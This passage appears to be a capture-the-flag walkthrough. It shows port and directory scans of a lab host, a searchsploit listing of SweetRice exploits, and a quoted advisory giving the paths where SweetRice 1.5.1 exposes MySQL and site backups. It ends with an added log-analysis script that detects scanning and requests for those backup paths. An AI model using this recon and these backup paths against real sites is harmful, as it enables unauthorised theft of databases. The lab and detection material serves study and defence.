$ nmap -A 10.10.147.101
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ feroxbuster -u http://10.10.147.101 -w /usr/share/wordlists/dirb/common.txt -s 200 204 301 302 307 308
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 1.6.2
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.147.101
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirb/common.txt
🆗 Status Codes │ [200, 204, 301, 302, 307, 308]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/1.6.2
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
⏯ Press [ENTER] to pause|resume your scan
──────────────────────────────────────────────────
200 375l 968w 11321c http://10.10.147.101/index.html
301 9l 28w 316c http://10.10.147.101/content
301 9l 28w 319c http://10.10.147.101/content/js
301 9l 28w 323c http://10.10.147.101/content/images
200 1l 6w 1150c http://10.10.147.101/content/images/favicon.ico
301 9l 28w 319c http://10.10.147.101/content/as
301 9l 28w 324c http://10.10.147.101/content/_themes
200 36l 151w 2199c http://10.10.147.101/content/index.php
301 9l 28w 327c http://10.10.147.101/content/attachment
301 9l 28w 320c http://10.10.147.101/content/inc
301 9l 28w 322c http://10.10.147.101/content/as/js
301 9l 28w 332c http://10.10.147.101/content/_themes/default
301 9l 28w 323c http://10.10.147.101/content/as/lib
200 114l 252w 3678c http://10.10.147.101/content/as/index.php
301 9l 28w 326c http://10.10.147.101/content/inc/cache
301 9l 28w 336c http://10.10.147.101/content/_themes/default/css
301 9l 28w 325c http://10.10.147.101/content/inc/font
http://10.10.147.101/content/index.php
http://10.10.147.101/content/as/index.php
$ searchsploit sweetrice
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
SweetRice 0.5.3 - Remote File Inclusion | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution | php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload | php/webapps/14184.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Backup Disclosure and CSRF/PHP Code Execution look interesting.
kalaratri@kali:~$ searchsploit -x php/webapps/40718.txt
Exploit: SweetRice 1.5.1 - Backup Disclosure
URL: https://www.exploit-db.com/exploits/40718
Path: /usr/share/exploitdb/exploits/php/webapps/40718.txt
File Type: ASCII text, with CRLF line terminators
Title: SweetRice 1.5.1 - Backup Disclosure
Application: SweetRice
Versions Affected: 1.5.1
Vendor URL: http://www.basic-cms.org/
Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
Discovered by: Ashiyane Digital Security Team
Tested on: Windows 10
Bugs: Backup Disclosure
Date: 16-Sept-2016
Proof of Concept :
You can access to all mysql backup and download them from this directory.
http://localhost/inc/mysql_backup
and can access to website files backup from:
http://localhost/SweetRice-transfer.zip
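
Seen from the server side, both the directory scan and requests for the backup paths named in the advisory stand out in the Apache access log. The script below is an added example, not part of the original write-up or of SweetRice; the log lines, the threshold and the function name `analyse` are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache "combined" log format: client, timestamp, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Backup locations named in the advisory quoted above (paths taken from the page).
BACKUP_RE = re.compile(r"/inc/mysql_backup(/|$)|/SweetRice-transfer\.zip$", re.I)
SCANNER_UA_RE = re.compile(r"feroxbuster", re.I)  # default User-Agent shown in the scan banner
ENUM_THRESHOLD = 5  # assumption: distinct paths per client before it counts as enumeration

# Constructed sample log lines (not from the page); client addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2021:10:00:01 +0000] "GET /content/js HTTP/1.1" 301 319 "-" "feroxbuster/1.6.2"
192.0.2.10 - - [01/Jan/2021:10:00:01 +0000] "GET /content/images HTTP/1.1" 301 323 "-" "feroxbuster/1.6.2"
192.0.2.10 - - [01/Jan/2021:10:00:01 +0000] "GET /content/as HTTP/1.1" 301 319 "-" "feroxbuster/1.6.2"
192.0.2.10 - - [01/Jan/2021:10:00:02 +0000] "GET /content/inc HTTP/1.1" 301 320 "-" "feroxbuster/1.6.2"
192.0.2.10 - - [01/Jan/2021:10:00:02 +0000] "GET /content/_themes HTTP/1.1" 301 324 "-" "feroxbuster/1.6.2"
192.0.2.10 - - [01/Jan/2021:10:00:02 +0000] "GET /admin HTTP/1.1" 404 275 "-" "feroxbuster/1.6.2"
192.0.2.10 - - [01/Jan/2021:10:05:40 +0000] "GET /content/inc/mysql_backup/ HTTP/1.1" 200 1150 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2021:10:06:00 +0000] "GET /content/index.php HTTP/1.1" 200 2199 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2021:10:07:00 +0000] "GET /SweetRice-transfer.zip HTTP/1.1" 404 275 "-" "curl/7.68.0"
"""

def analyse(log_text):
    """Return {client_ip: sorted list of finding tags} for one access log."""
    findings = defaultdict(set)
    paths = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, path, status = m["ip"], m["path"].split("?")[0], int(m["status"])
        paths[ip].add(path)
        if SCANNER_UA_RE.search(m["ua"]):
            findings[ip].add("scanner-user-agent")
        if BACKUP_RE.search(path):
            # A 200 means the backup location was actually served, not just probed.
            findings[ip].add("backup-exposed" if status == 200 else "backup-probe")
    for ip, seen in paths.items():
        if len(seen) >= ENUM_THRESHOLD:
            findings[ip].add("path-enumeration")
    return {ip: sorted(tags) for ip, tags in findings.items()}

if __name__ == "__main__":
    for ip, tags in analyse(SAMPLE_LOG).items():
        print(ip, ", ".join(tags))
```

A `backup-exposed` hit is the one to act on first: it means the web server answered 200 for a path that should be denied or moved outside the document root.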